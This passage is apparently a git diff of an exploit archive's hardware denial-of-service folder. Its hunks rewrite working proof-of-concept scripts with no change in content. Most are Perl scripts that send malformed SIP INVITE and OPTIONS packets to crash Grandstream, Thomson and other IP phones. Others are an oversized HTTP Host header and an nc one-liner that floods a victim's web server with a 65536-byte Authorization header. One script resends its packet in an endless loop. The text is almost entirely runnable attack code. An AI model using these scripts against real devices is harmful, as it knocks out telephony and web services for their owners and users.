+192.168.1.2;branch=z9hG4jk\r\nFrom: sip:chirimolla +\@192.168.1.2;tag=qwzng\r\nTo: \r +\nCall-ID: fosforito\@192.168.1.1\r\nCSeq: 921 INVITE\r +\nRemote-Party-ID: csip:7940-1\@192.168.\xd1.7\r\n\r\n"; + +$socket->send($msg); + +# milw0rm.com [2007-03-20] diff --git a/platforms/hardware/dos/3535.pl b/platforms/hardware/dos/3535.pl index a450357fb..9ab120d8f 100755 --- a/platforms/hardware/dos/3535.pl +++ b/platforms/hardware/dos/3535.pl @@ -1,85 +1,85 @@ -#!/usr/bin/perl -# MADYNES Security Advisory -# http://madynes.loria.fr -# -# Title: Grandstream Budge Tone-200 denial of service vulnerability -# -# Release Date: 21/03/2007 -# -# Severity: High - Denial of Service -# -# Advisory ID:KIPH3 -# -# Hardware: Grandstream Budge Tone-200 IP Phone -# http://www.grandstream.com/consumerphones.html -# -# Affected Versions: Program-- 1.1.1.14 Bootloader-- 1.1.1.5 -# -# Other versions maybe. -# -# Vulnerability Synopsis: After sending a crafted INVITE/CANCE or any -# message with a "WWW-Authenticate" where the "Digest domain" is crafted -# the device freezes provoking a DoS. -# -# Impact: A remote individual can remotely crash and perform a Denial of -# Service(DoS) attack in all the services provided by the software by -# sending one crafted SIP INVITE message. This is conceptually similar to -# the "ping of death". -# -# Resolution: The vendor was contacted at multiple times, the complete -# report was sent, but no feedback whatsoever resulted. -# -# Vulnerability Description: the device reboots after a crafted INVITE -# message had been sent. -# -# Configuration of our device: -# -# Software Version: Program-- 1.1.1.14 Bootloader-- 1.1.1.5 -# -# IP-Address obtained by DHCP as 192.168.1.105 -# -# The configuration is the default -# -# Vulnerability: -# -# After sending a crafted INVITE, CANCEL or any message with a -# "WWW-Authenticate" where the "Digest domain" is crafted the device -# freezes provoking a DoS. -# -# Credits: -# Humberto J. Abdelnur (Ph.D Student) -# Radu State (Ph.D) -# Olivier Festor (Ph.D) -# This vulnerability was identified by the Madynes research team at INRIA -# Lorraine, using the Madynes VoIP fuzzer. -# http://madynes.loria.fr/ -# Exploit: -# -# To run the exploit the file invite_grandstream.pl should be launched -# (assuming our configurations) as: -# -# perl invite_grandstream.pl 192.168.1.105 5060 Fosforito -# -# Proof of Concept Code: - -use IO::Socket::INET; - -die "Usage $0 " unless ($ARGV[2]); - - - -$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], - - Proto=>'udp', - - PeerAddr=>$ARGV[0]); - - - -$AUTH = "WWW-Authenticate: Digest domain=\"/-+:\@=\$\%D6\$;\$=;=\$=\$,\@\$.=;\@;;,&&+:::=\@/2\$&;6+;+=\%A5==;\@:=;\$&\%A3:u,\@=\@;&;\@+::+&;+,,&/&\@=,;=&:&,=&:;:;;K+&\@=\%DA*\$;\@&+&:;/==\%37:\%A6;,\@\%ED,:=:\@,;\%DA;&\$)\$+=;+:\%FE\$:\@;&=,W;,g\%EF;\%FB:+\@O\$+\%AF+;+:,&=\%CA\%EA;\$,\@+/;\@,-;:;,P&\@;_\$:\%C7&+&/!,\%EE\$:,\@:;;\@&\@,+,z\@\$;\@\@\$\$::\@/=,\$3\%ED=\@+\%AE/=&\@;;\$;&\$\%FE:\@;\$+:\$\%EB\$=&:;&K&;:\@\%EA,=\%BA6\%21;=&:\$\"\r\n"; - -$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=z9hG4bK056a27e7;rport\r\nFrom: ;tag=as011d1185\r\nTo: ;$TOTAG\r\n$AUTH\CSeq: 6106 INVITE\r\Max-Forwards: 70\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - -# milw0rm.com [2007-03-21] +#!/usr/bin/perl +# MADYNES Security Advisory +# http://madynes.loria.fr +# +# Title: Grandstream Budge Tone-200 denial of service vulnerability +# +# Release Date: 21/03/2007 +# +# Severity: High - Denial of Service +# +# Advisory ID:KIPH3 +# +# Hardware: Grandstream Budge Tone-200 IP Phone +# http://www.grandstream.com/consumerphones.html +# +# Affected Versions: Program-- 1.1.1.14 Bootloader-- 1.1.1.5 +# +# Other versions maybe. +# +# Vulnerability Synopsis: After sending a crafted INVITE/CANCE or any +# message with a "WWW-Authenticate" where the "Digest domain" is crafted +# the device freezes provoking a DoS. +# +# Impact: A remote individual can remotely crash and perform a Denial of +# Service(DoS) attack in all the services provided by the software by +# sending one crafted SIP INVITE message. This is conceptually similar to +# the "ping of death". +# +# Resolution: The vendor was contacted at multiple times, the complete +# report was sent, but no feedback whatsoever resulted. +# +# Vulnerability Description: the device reboots after a crafted INVITE +# message had been sent. +# +# Configuration of our device: +# +# Software Version: Program-- 1.1.1.14 Bootloader-- 1.1.1.5 +# +# IP-Address obtained by DHCP as 192.168.1.105 +# +# The configuration is the default +# +# Vulnerability: +# +# After sending a crafted INVITE, CANCEL or any message with a +# "WWW-Authenticate" where the "Digest domain" is crafted the device +# freezes provoking a DoS. +# +# Credits: +# Humberto J. Abdelnur (Ph.D Student) +# Radu State (Ph.D) +# Olivier Festor (Ph.D) +# This vulnerability was identified by the Madynes research team at INRIA +# Lorraine, using the Madynes VoIP fuzzer. +# http://madynes.loria.fr/ +# Exploit: +# +# To run the exploit the file invite_grandstream.pl should be launched +# (assuming our configurations) as: +# +# perl invite_grandstream.pl 192.168.1.105 5060 Fosforito +# +# Proof of Concept Code: + +use IO::Socket::INET; + +die "Usage $0 " unless ($ARGV[2]); + + + +$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], + + Proto=>'udp', + + PeerAddr=>$ARGV[0]); + + + +$AUTH = "WWW-Authenticate: Digest domain=\"/-+:\@=\$\%D6\$;\$=;=\$=\$,\@\$.=;\@;;,&&+:::=\@/2\$&;6+;+=\%A5==;\@:=;\$&\%A3:u,\@=\@;&;\@+::+&;+,,&/&\@=,;=&:&,=&:;:;;K+&\@=\%DA*\$;\@&+&:;/==\%37:\%A6;,\@\%ED,:=:\@,;\%DA;&\$)\$+=;+:\%FE\$:\@;&=,W;,g\%EF;\%FB:+\@O\$+\%AF+;+:,&=\%CA\%EA;\$,\@+/;\@,-;:;,P&\@;_\$:\%C7&+&/!,\%EE\$:,\@:;;\@&\@,+,z\@\$;\@\@\$\$::\@/=,\$3\%ED=\@+\%AE/=&\@;;\$;&\$\%FE:\@;\$+:\$\%EB\$=&:;&K&;:\@\%EA,=\%BA6\%21;=&:\$\"\r\n"; + +$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=z9hG4bK056a27e7;rport\r\nFrom: ;tag=as011d1185\r\nTo: ;$TOTAG\r\n$AUTH\CSeq: 6106 INVITE\r\Max-Forwards: 70\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + +# milw0rm.com [2007-03-21] diff --git a/platforms/hardware/dos/358.txt b/platforms/hardware/dos/358.txt index 2fbf379b1..fa906063f 100755 --- a/platforms/hardware/dos/358.txt +++ b/platforms/hardware/dos/358.txt @@ -1,3 +1,3 @@ -GET / HTTP/1.0\r\n /Host:AAAAAA[1024]. - -# milw0rm.com [2004-07-22] +GET / HTTP/1.0\r\n /Host:AAAAAA[1024]. + +# milw0rm.com [2004-07-22] diff --git a/platforms/hardware/dos/363.txt b/platforms/hardware/dos/363.txt index 6b60d2420..cc46ef3ea 100755 --- a/platforms/hardware/dos/363.txt +++ b/platforms/hardware/dos/363.txt @@ -1,5 +1,5 @@ $ $victima="ip.victim" $ perl -e 'print "GET / HTTP/1.1\r\nHost: '"$victima"'\r\nAuthorization: -Basic " . 'A' x 65536 . "\r\n\r\n"' | nc -vvn $victima 80 - -# milw0rm.com [2004-07-22] +Basic " . 'A' x 65536 . "\r\n\r\n"' | nc -vvn $victima 80 + +# milw0rm.com [2004-07-22] diff --git a/platforms/hardware/dos/3791.pl b/platforms/hardware/dos/3791.pl index 62e43cbf4..95d0f5bee 100755 --- a/platforms/hardware/dos/3791.pl +++ b/platforms/hardware/dos/3791.pl @@ -1,47 +1,47 @@ -#!/usr/bin/perl - -use IO::Socket::INET; - -die "Usage $0 " unless ($ARGV[2]); - - - -$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], - - Proto=>'udp', - - PeerAddr=>$ARGV[0]); - - - - - -$msg = - -"INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r - -Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r - -Max-Forwards: 70\377\r - -To: lynksys \377\r - -From: ;tag=00\377\r - -Call-ID: tucu\@192.168.1.2\377\r - -CSeq: 24865 INVITE\377\r - -Contact: \377\r - -Supported: 100rel\377\r - -Content-Length: 0\377\r - -\r\n"; - - - -$socket->send($msg); - -# milw0rm.com [2007-04-24] +#!/usr/bin/perl + +use IO::Socket::INET; + +die "Usage $0 " unless ($ARGV[2]); + + + +$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], + + Proto=>'udp', + + PeerAddr=>$ARGV[0]); + + + + + +$msg = + +"INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\377\r + +Via: SIP/2.0/UDP 192.168.1.2;rport;branch=00\377\r + +Max-Forwards: 70\377\r + +To: lynksys \377\r + +From: ;tag=00\377\r + +Call-ID: tucu\@192.168.1.2\377\r + +CSeq: 24865 INVITE\377\r + +Contact: \377\r + +Supported: 100rel\377\r + +Content-Length: 0\377\r + +\r\n"; + + + +$socket->send($msg); + +# milw0rm.com [2007-04-24] diff --git a/platforms/hardware/dos/3792.pl b/platforms/hardware/dos/3792.pl index 50b83e264..8d9b62139 100755 --- a/platforms/hardware/dos/3792.pl +++ b/platforms/hardware/dos/3792.pl @@ -1,89 +1,89 @@ -#!/usr/bin/perl - - - -use IO::Socket; - - - -#die "Usage $0 " unless ($ARGV[2]); - -die "Usage $0 " unless ($ARGV[0]); - - - -my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp'); - -$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061'); - - - -$touser=$ARGV[0]; - -$target=$ARGV[1]; - -$sourceaddress=$ARGV[2]; - -$sourceport=$ARGV[3]; - -$high=2000; - -$low=1; - -$fromuserid = int(rand( $high-$low+1 ) ) + $low; - -my $cseq = "INVITE"; - - - -$msg = "INVITE sip:$touser\@$target SIP/2.0\r - -Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r - -From: \377;tag=779\r - -To: Receiver \r - -Call-ID: 10\@$sourceaddress\r - -CSeq: 1 $cseq\r - -Contact: 779 \r - -Expires: 1200\r - -Max-Forwards: 70\r - -Content-Type: application/sdp\r - -Content-Length: 133\r - -\r - -v=0\r - -o=0 0 0 IN IP4 $sourceaddress\r - -s=Session SDP\r - -c=IN IP4 $sourceaddress\r - -t=0 0\r - -m=audio 9876 RTP/AVP 0\r - -a=rtpmap:0 PCMU/8000\r"; - - - -$sock or die "no socket :$!"; - -while (1){ - - $socket->send($msg); - - sleep 90; - - } - -# milw0rm.com [2007-04-24] +#!/usr/bin/perl + + + +use IO::Socket; + + + +#die "Usage $0 " unless ($ARGV[2]); + +die "Usage $0 " unless ($ARGV[0]); + + + +my $sock = new IO::Socket::INET( LocalHost => $ARGV[2], LocalPort => $ARGV[3], Proto => 'udp'); + +$socket=new IO::Socket::INET->new(PeerAddr=>$ARGV[1], PeerPort=> '5060', Proto=>'udp', LocalAddr=>$ARGV[2], LocalPort=>'5061'); + + + +$touser=$ARGV[0]; + +$target=$ARGV[1]; + +$sourceaddress=$ARGV[2]; + +$sourceport=$ARGV[3]; + +$high=2000; + +$low=1; + +$fromuserid = int(rand( $high-$low+1 ) ) + $low; + +my $cseq = "INVITE"; + + + +$msg = "INVITE sip:$touser\@$target SIP/2.0\r + +Via: SIP/2.0/UDP $sourceaddress:$sourceport;branch=z9hG4bK00000\r + +From: \377;tag=779\r + +To: Receiver \r + +Call-ID: 10\@$sourceaddress\r + +CSeq: 1 $cseq\r + +Contact: 779 \r + +Expires: 1200\r + +Max-Forwards: 70\r + +Content-Type: application/sdp\r + +Content-Length: 133\r + +\r + +v=0\r + +o=0 0 0 IN IP4 $sourceaddress\r + +s=Session SDP\r + +c=IN IP4 $sourceaddress\r + +t=0 0\r + +m=audio 9876 RTP/AVP 0\r + +a=rtpmap:0 PCMU/8000\r"; + + + +$sock or die "no socket :$!"; + +while (1){ + + $socket->send($msg); + + sleep 90; + + } + +# milw0rm.com [2007-04-24] diff --git a/platforms/hardware/dos/4297.pl b/platforms/hardware/dos/4297.pl index 8239daeb4..fa469c504 100755 --- a/platforms/hardware/dos/4297.pl +++ b/platforms/hardware/dos/4297.pl @@ -1,36 +1,36 @@ -#!/usr/bin/perl -use IO::Socket::INET; - -die "Usage $0 " unless ($ARGV[2]); - - - -$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], - - Proto=>'udp', - - PeerAddr=>$ARGV[0]); - - - -$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n";; - -$socket->send($msg); - - - -sleep(1); - -$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(1); - -$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: ;tag=02\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - -# milw0rm.com [2007-08-21] +#!/usr/bin/perl +use IO::Socket::INET; + +die "Usage $0 " unless ($ARGV[2]); + + + +$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], + + Proto=>'udp', + + PeerAddr=>$ARGV[0]); + + + +$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP\t192.168.1.2;rport;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: et\@192.168.1.2\r\nCSeq: 10 INVITE\r\nContent-Length: 0\r\n\r\n";; + +$socket->send($msg); + + + +sleep(1); + +$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=01\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 11 OPTIONS\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(1); + +$msg ="OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;rport;branch=02\r\nFrom: ;tag=02\r\nTo: \r\nCall-ID: et\@192.168.1.2\r\nCSeq: 12 OPTIONS\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + +# milw0rm.com [2007-08-21] diff --git a/platforms/hardware/dos/4298.pl b/platforms/hardware/dos/4298.pl index 10b7897c1..f176f99c9 100755 --- a/platforms/hardware/dos/4298.pl +++ b/platforms/hardware/dos/4298.pl @@ -1,95 +1,95 @@ -#!/usr/bin/perl - -use IO::Socket::INET; - -die "Usage $0 " unless ($ARGV[3]); - - - -$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], - - Proto=>'udp', - - PeerAddr=>$ARGV[0]); - - - - - -$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=01;rport\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 7532 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0 PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n"; - -$socket->send($msg); - - - -sleep(8.2); - -$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=02\r\nCall-ID: 02\@$ARGV[3]\r\nCSeq: 79 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(1.5); - -$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=03\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 15853 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(3.3); - -$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=04\r\nCall-ID: 04\@$ARGV[3]\r\nCSeq: 36688 INVITE\r\nContent-Type: application/sdp\r\nAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY, NOTIFY, SUBSCRIBE, INFO\r\nSupported: 100rel\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 314\r\n\r\nv=0\r\no=0231555775 2006994253 1729335607 IN IP4 192.168.1.101\r\ns=-\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=audio 8002 RTP/AVP 98 97 8 0 3 101\r\na=rtpmap:98 speex/16000\r\na=rtpmap:97 peex/80-0\r\na=rtpmap:8 PCMA/8000\r\na=rtpmap:0 PCMU/8000\r\na=rtpma\x00:3 GSM/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-15\r\na=ptime:20\r\n"; - -$socket->send($msg); - - - -sleep(4); - -$msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(4); - -$msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 18031 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(12); - -$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=07\r\nCall-ID: 07\@$ARGV[3]\r\nCSeq: 41664 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(3); - -$msg = "INVITE sip:invaliduser\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=02;rport\r\nFrom: ;tag=08\r\nTo: \r\nContact: \r\nCall-ID: 08\@$ARGV[3]\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286\r\n\r\nv=0\r\no=root 7213 7217 IN IP4 192.168.1.4\r\ns=session\r\nc=IN IP4 192.168.1.4\r\nt=0 0\r\nm=audio 19024 RTP/AVP 0 3 8 97 101\r\na=rtpmap:0 PCMU/8000\r\na=rtpmap:3/GSM/8000\r\na=rtpmIp:8 PCMA/8000\r\na=rtpmap:97 spee8/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n"; - -$socket->send($msg); - - - -sleep(3); - -$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=09\r\nCall-ID: 09\@$ARGV[3]\r\nCSeq: 18883 OPTIONS\r\nAccept: application/sdp\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - - - -sleep(3); - -$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=10\r\nCall-ID: 10\@$ARGV[3]\r\nCSeq: 6298 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; - -$socket->send($msg); - -# milw0rm.com [2007-08-21] +#!/usr/bin/perl + +use IO::Socket::INET; + +die "Usage $0 " unless ($ARGV[3]); + + + +$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], + + Proto=>'udp', + + PeerAddr=>$ARGV[0]); + + + + + +$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=01;rport\r\nFrom: ;tag=01\r\nTo: \r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 7532 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYL, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 215\r\n\r\nv=0\r\no=r`ot 7213 7244 IN IP4 192.168.1.101\r\ns=session\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=aIdio 8000 RTP/AVP 0 101\r\na=rtpmau:0 PCMU/8000\r\na=rtpmap:101 telephone-event/80 0\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n"; + +$socket->send($msg); + + + +sleep(8.2); + +$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=02\r\nCall-ID: 02\@$ARGV[3]\r\nCSeq: 79 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(1.5); + +$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=03\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 15853 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(3.3); + +$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=04\r\nCall-ID: 04\@$ARGV[3]\r\nCSeq: 36688 INVITE\r\nContent-Type: application/sdp\r\nAllow: INVITE, ACK, BTE, CANCEL, OPTIONS, PRACK, REFEY, NOTIFY, SUBSCRIBE, INFO\r\nSupported: 100rel\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 314\r\n\r\nv=0\r\no=0231555775 2006994253 1729335607 IN IP4 192.168.1.101\r\ns=-\r\nc=IN IP4 192.168.1.101\r\nt=0 0\r\nm=audio 8002 RTP/AVP 98 97 8 0 3 101\r\na=rtpmap:98 speex/16000\r\na=rtpmap:97 peex/80-0\r\na=rtpmap:8 PCMA/8000\r\na=rtpmap:0 PCMU/8000\r\na=rtpma\x00:3 GSM/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-15\r\na=ptime:20\r\n"; + +$socket->send($msg); + + + +sleep(4); + +$msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 21013 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(4); + +$msg = "OPTIONS sip:$ARGV[2]\@invalidURL SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=01\r\nCall-ID: 01\@$ARGV[3]\r\nCSeq: 18031 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(12); + +$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=07\r\nCall-ID: 07\@$ARGV[3]\r\nCSeq: 41664 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(3); + +$msg = "INVITE sip:invaliduser\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];branch=02;rport\r\nFrom: ;tag=08\r\nTo: \r\nContact: \r\nCall-ID: 08\@$ARGV[3]\r\nCSeq: 35502 INVITE\r\nMax-Forwards: 70\r\nAllow: INVITE, ACK, CANCEL, OPTIONS, BYE, REFER, SUBSCRIBE, NOTIFY\r\nContent-Type: application/sdp\r\nContent-Length: 286\r\n\r\nv=0\r\no=root 7213 7217 IN IP4 192.168.1.4\r\ns=session\r\nc=IN IP4 192.168.1.4\r\nt=0 0\r\nm=audio 19024 RTP/AVP 0 3 8 97 101\r\na=rtpmap:0 PCMU/8000\r\na=rtpmap:3/GSM/8000\r\na=rtpmIp:8 PCMA/8000\r\na=rtpmap:97 spee8/8000\r\na=rtpmap:101 telephone-event/8000\r\na=fmtp:101 0-16\r\na=silenceSupp:off - - - -\r\n"; + +$socket->send($msg); + + + +sleep(3); + +$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=09\r\nCall-ID: 09\@$ARGV[3]\r\nCSeq: 18883 OPTIONS\r\nAccept: application/sdp\r\nUser-Agent: Twinkle/0.9\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + + + +sleep(3); + +$msg = "OPTIONS sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP $ARGV[3];rport;branch=02\r\nMax-Forwards: 70\r\nTo: \r\nFrom: ;tag=10\r\nCall-ID: 10\@$ARGV[3]\r\nCSeq: 6298 OPTIONS\r\nAccept: application/sdp\r\nContent-Length: 0\r\n\r\n"; + +$socket->send($msg); + +# milw0rm.com [2007-08-21] diff --git a/platforms/hardware/dos/4319.pl b/platforms/hardware/dos/4319.pl index 121d3f101..787581ed6 100755 --- a/platforms/hardware/dos/4319.pl +++ b/platforms/hardware/dos/4319.pl @@ -1,23 +1,23 @@ -#!/usr/bin/perl - -#Vulneravility for Thomson 2030 firmware v1.52.1 - -#It provokes a DoS in the device. - -use IO::Socket::INET; - -die "Usage $0 " unless ($ARGV[2]); - - -$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], - - Proto=>'udp', - - PeerAddr=>$ARGV[0]); - - -$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: humbol\@192.168.1.2\r\nCSeq: 1 INVITE\r\n\r\n"; - -$socket->send($msg); - -# milw0rm.com [2007-08-27] +#!/usr/bin/perl + +#Vulneravility for Thomson 2030 firmware v1.52.1 + +#It provokes a DoS in the device. + +use IO::Socket::INET; + +die "Usage $0 " unless ($ARGV[2]); + + +$socket=new IO::Socket::INET->new(PeerPort=>$ARGV[1], + + Proto=>'udp', + + PeerAddr=>$ARGV[0]); + + +$msg = "INVITE sip:$ARGV[2]\@$ARGV[0] SIP/2.0\r\nVia: SIP/2.0/UDP 192.168.1.2;branch=00\r\nFrom: ;tag=00\r\nTo: ;tag=00\r\nCall-ID: humbol\@192.168.1.2\r\nCSeq: 1 INVITE\r\n\r\n"; + +$socket->send($msg); + +# milw0rm.com [2007-08-27] diff --git a/platforms/hardware/dos/4426.pl b/platforms/hardware/dos/4426.pl index 803d13403..4061fe68d 100755 --- a/platforms/hardware/dos/4426.pl +++ b/platforms/hardware/dos/4426.pl @@ -1,156 +1,156 @@ -#!/usr/bin/perl -w -# -# Airsensor M520 HTTPD Remote Preauth Denial Of Service and Buffer Overflow PoC -# -# The vulnerability is caused due to an unspecified error in the cgis -# files filter used for configure propierties. This can be exploited by -# sending a specially crafted 